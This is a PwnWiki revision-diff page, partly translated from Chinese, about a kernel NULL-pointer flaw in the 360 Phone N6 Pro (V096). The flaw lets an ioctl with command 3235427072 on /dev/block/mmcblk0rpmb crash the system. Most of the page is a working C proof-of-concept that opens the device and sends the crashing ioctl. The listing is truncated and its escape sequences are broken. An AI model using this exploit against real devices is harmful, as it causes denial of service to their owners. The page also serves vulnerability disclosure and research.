Difference between revisions of "360 Phone N6 Pro內核漏洞/en"

From PwnWiki
(Created page with "360 Phone N6 Pro Kernel Vulnerability")
 
(Created page with "The kernel module in the 360 Phone N6 Pro V096 kernel component allows an attacker to use the command 3235427072 to inject variable on device <code>/dev/block/mmcblk0rpmb</cod...")
 
(One intermediate revision by the same user not shown)
Line 1: Line 1:
 
<languages  />
 
<languages  />
<div lang="chinese" dir="ltr" class="mw-content-ltr">
+
==Principle of the vulnerability==
==漏洞原理==
 
</div>
 
  
<div lang="chinese" dir="ltr" class="mw-content-ltr">
+
The kernel module in the 360 Phone N6 Pro V096 kernel component allows an attacker to use the command 3235427072 to inject variable on device <code>/dev/block/mmcblk0rpmb</code> and cause the kernel to crash.
360 Phone N6 Pro V096內核組件中的內核模塊允許攻擊者使用命令3235427072在設備<code>/dev/block/mmcblk0rpmb</code>上通過ioctl的自變量注入精心設計的自變量,並導致內核崩潰。
 
</div>
 
  
<div lang="chinese" dir="ltr" class="mw-content-ltr">
+
==Impact of the vulnerability==
==漏洞影響==
 
</div>
 
  
 
360 Phone N6 Pro 1801-A01
 
360 Phone N6 Pro 1801-A01

Latest revision as of 11:38, 31 May 2021

Other languages:
Bahasa Indonesia • ‎Chinese • ‎English • ‎русский • ‎עברית • ‎中文(中国大陆)‎ • ‎粵語

Principle of the vulnerability

The kernel module in the 360 Phone N6 Pro V096 kernel component allows an attacker to use the command 3235427072 to inject variable on device /dev/block/mmcblk0rpmb and cause the kernel to crash.

Impact of the vulnerability

360 Phone N6 Pro 1801-A01

POC

/*
* This is poc of 360 N6 Pro, 1801-A01
* Android Version: 7.1.1
* Version Number: V096
* Kernel Version: Linux localhost 4.4.21-perf #1 SMP PREEMPT Wed Mar 28 15:24:20 UTC 2018 aarch64
* A NULL pointer bug in the ioctl interface of device file /dev/block/mmcblk0rpmb causes the system crash via IOCTL 3235427072.
* This Poc should run with permission to do ioctl on /dev/block/mmcblk0rpmb.
*/
#include <stdio.h>
#include <fcntl.h>
#include <errno.h>
#include <sys/ioctl.h>

const static char *driver = "/dev/block/mmcblk0rpmb";
static command = 3235427072; // 0xc0d8b300

int main(int argc, char **argv, char **env) {
int fd = 0;
fd = open(driver, O_RDWR);
if (fd < 0) {
printf("Failed to open %s, with errno %dn", driver, errno);
system("echo 1 > /data/local/tmp/log");
return -1;
}

printf("Try ioctl device file '%s', with command 0x%x and payload NULLn", driver, command);
printf("System will crash and reboot.n");
if(ioctl(fd, command, NULL) < 0) {
printf("Allocation of structs failed, %dn", errno);
system("echo 2 > /data/local/tmp/log");
return -1;
}
close(fd);
return 0;
Retrieved from "https://pwnwiki.com/index.php?title=360_Phone_N6_Pro內核漏洞/en&oldid=3750"